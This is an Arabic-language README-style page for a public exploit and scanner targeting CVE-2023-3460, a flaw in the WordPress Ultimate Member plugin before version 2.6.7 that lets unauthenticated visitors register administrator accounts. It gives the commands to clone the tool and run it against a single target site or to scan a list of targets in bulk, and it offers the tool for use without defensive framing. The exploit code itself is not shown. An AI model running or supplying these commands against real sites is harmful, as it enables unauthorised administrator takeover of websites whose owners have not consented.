
استغلال وماسح ضوئي لثغرة CVE-2023-3460، وهي ثغرة تصعيد صلاحيات في إضافة Ultimate Member الخاصة بووردبريس تسمح بإنشاء حساب مسؤول دون مصادقة.
المكون الإضافي Ultimate Member لووردبريس قبل الإصدار 2.6.7 لا يمنع الزوار من إنشاء حسابات مستخدمين بصلاحيات عشوائية، مما يسمح للمهاجمين بإنشاء حسابات مدير بحرية. يقوم هذا السكريبت باستغلال هذه الثغرة ومسح أهداف مختلفة بحثًا عن هذه الثغرة.
git clone https://github.com/diego-tella/CVE-2023-3460/
cd CVE-2023-3460/
python exploit.py
python exploit.py -t http://target.com/wordpress #basic usage
python exploit.py -c -l list.txt #scan a list of targets